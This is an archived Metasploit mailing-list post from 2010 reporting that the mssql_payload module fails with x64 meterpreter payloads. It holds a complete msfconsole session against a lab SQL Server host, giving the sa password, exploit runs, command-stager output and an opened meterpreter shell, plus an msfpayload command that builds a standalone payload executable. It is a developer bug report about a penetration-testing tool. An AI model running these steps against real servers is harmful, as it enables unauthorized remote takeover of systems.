Metasploit mailing list archives
Issues with x64 based payloads
From: David Kennedy <kennedyd013 () gmail com>
Date: Sat, 19 Jun 2010 23:37:43 -0400
Anyone experiencing issues when using mssql_payload via an x64-based system? It worked fine about two weeks ago; however, it appears something may have changed. Example below tested on a Server 2008 x64:

root@bt:/pentest/exploits/framework3# msfconsole

[Metasploit ASCII-art banner]

       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 274 auxiliary
+ -- --=[ 209 payloads - 26 encoders - 8 nops
       =[ svn r9563 updated today (2010.06.19)

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set rhost 172.16.32.217
rhost => 172.16.32.217
msf exploit(mssql_payload) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(mssql_payload) > show options

Module options:

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PASSWORD                       no        The password for the specified username
   RHOST         172.16.32.217    yes       The target address
   RPORT         1433             yes       The target port
   USERNAME      sa               no        The username to authenticate as
   UseCmdStager  true             no        Wait for user input before returning from exploit
   VERBOSE       false            no        Enable verbose output

Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The listen port
   RHOST     172.16.32.217    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(mssql_payload) > set password P@55w0rd
password => P@55w0rd
expmsf exploit(mssql_payload) > exploit

[*] Started bind handler
[*] Command Stager progress - 2.80% done (1499/53629 bytes)
[*] Command Stager progress - 5.59% done (2998/53629 bytes)
[*] Command Stager progress - 8.39% done (4497/53629 bytes)
[*] Command Stager progress - 11.18% done (5996/53629 bytes)
[*] Command Stager progress - 13.98% done (7495/53629 bytes)
[*] Command Stager progress - 16.77% done (8994/53629 bytes)
[*] Command Stager progress - 19.57% done (10493/53629 bytes)
[*] Command Stager progress - 22.36% done (11992/53629 bytes)
[*] Command Stager progress - 25.16% done (13491/53629 bytes)
[*] Command Stager progress - 27.95% done (14990/53629 bytes)
[*] Command Stager progress - 30.75% done (16489/53629 bytes)
[*] Command Stager progress - 33.54% done (17988/53629 bytes)
[*] Command Stager progress - 36.34% done (19487/53629 bytes)
[*] Command Stager progress - 39.13% done (20986/53629 bytes)
[*] Command Stager progress - 41.93% done (22485/53629 bytes)
[*] Command Stager progress - 44.72% done (23984/53629 bytes)
[*] Command Stager progress - 47.52% done (25483/53629 bytes)
[*] Command Stager progress - 50.31% done (26982/53629 bytes)
[*] Command Stager progress - 53.11% done (28481/53629 bytes)
[*] Command Stager progress - 55.90% done (29980/53629 bytes)
[*] Command Stager progress - 58.70% done (31479/53629 bytes)
[*] Command Stager progress - 61.49% done (32978/53629 bytes)
[*] Command Stager progress - 64.29% done (34477/53629 bytes)
[*] Command Stager progress - 67.08% done (35976/53629 bytes)
[*] Command Stager progress - 69.88% done (37475/53629 bytes)
[*] Command Stager progress - 72.67% done (38974/53629 bytes)
[*] Command Stager progress - 75.47% done (40473/53629 bytes)
[*] Command Stager progress - 78.26% done (41972/53629 bytes)
[*] Command Stager progress - 81.06% done (43471/53629 bytes)
[*] Command Stager progress - 83.85% done (44970/53629 bytes)
[*] Command Stager progress - 86.65% done (46469/53629 bytes)
[*] Command Stager progress - 89.44% done (47968/53629 bytes)
[*] Command Stager progress - 92.24% done (49467/53629 bytes)
[*] Command Stager progress - 95.03% done (50966/53629 bytes)
[*] Command Stager progress - 97.73% done (52410/53629 bytes)
[*] Command Stager progress - 100.00% done (53629/53629 bytes)
[*] Exploit completed, but no session was created.
msf exploit(mssql_payload) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(mssql_payload) > exploit

[*] Started bind handler
[*] Command Stager progress - 2.80% done (1499/53629 bytes)
[*] Command Stager progress - 5.59% done (2998/53629 bytes)
[*] Command Stager progress - 8.39% done (4497/53629 bytes)
[*] Command Stager progress - 11.18% done (5996/53629 bytes)
[*] Command Stager progress - 13.98% done (7495/53629 bytes)
[*] Command Stager progress - 16.77% done (8994/53629 bytes)
[*] Command Stager progress - 19.57% done (10493/53629 bytes)
[*] Command Stager progress - 22.36% done (11992/53629 bytes)
[*] Command Stager progress - 25.16% done (13491/53629 bytes)
[*] Command Stager progress - 27.95% done (14990/53629 bytes)
[*] Command Stager progress - 30.75% done (16489/53629 bytes)
[*] Command Stager progress - 33.54% done (17988/53629 bytes)
[*] Command Stager progress - 36.34% done (19487/53629 bytes)
[*] Command Stager progress - 39.13% done (20986/53629 bytes)
[*] Command Stager progress - 41.93% done (22485/53629 bytes)
[*] Command Stager progress - 44.72% done (23984/53629 bytes)
[*] Command Stager progress - 47.52% done (25483/53629 bytes)
[*] Command Stager progress - 50.31% done (26982/53629 bytes)
[*] Command Stager progress - 53.11% done (28481/53629 bytes)
[*] Command Stager progress - 55.90% done (29980/53629 bytes)
[*] Command Stager progress - 58.70% done (31479/53629 bytes)
[*] Command Stager progress - 61.49% done (32978/53629 bytes)
[*] Command Stager progress - 64.29% done (34477/53629 bytes)
[*] Command Stager progress - 67.08% done (35976/53629 bytes)
[*] Command Stager progress - 69.88% done (37475/53629 bytes)
[*] Command Stager progress - 72.67% done (38974/53629 bytes)
[*] Command Stager progress - 75.47% done (40473/53629 bytes)
[*] Command Stager progress - 78.26% done (41972/53629 bytes)
[*] Command Stager progress - 81.06% done (43471/53629 bytes)
[*] Command Stager progress - 83.85% done (44970/53629 bytes)
[*] Command Stager progress - 86.65% done (46469/53629 bytes)
[*] Command Stager progress - 89.44% done (47968/53629 bytes)
[*] Command Stager progress - 92.24% done (49467/53629 bytes)
[*] Command Stager progress - 95.03% done (50966/53629 bytes)
[*] Command Stager progress - 97.73% done (52410/53629 bytes)
[*] Sending stage (748032 bytes) to 172.16.32.217
[*] Command Stager progress - 100.00% done (53629/53629 bytes)
[*] Meterpreter session 1 opened (172.16.32.129:52110 -> 172.16.32.217:4444) at 2010-06-19 23:30:05 -0400

meterpreter >

Interestingly enough, if you just do a

msfpayload windows/x64/meterpreter/bind_tcp LPORT=443 X > moo.exe

and copy it over to the system, it works.

Thanks!

Dave
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework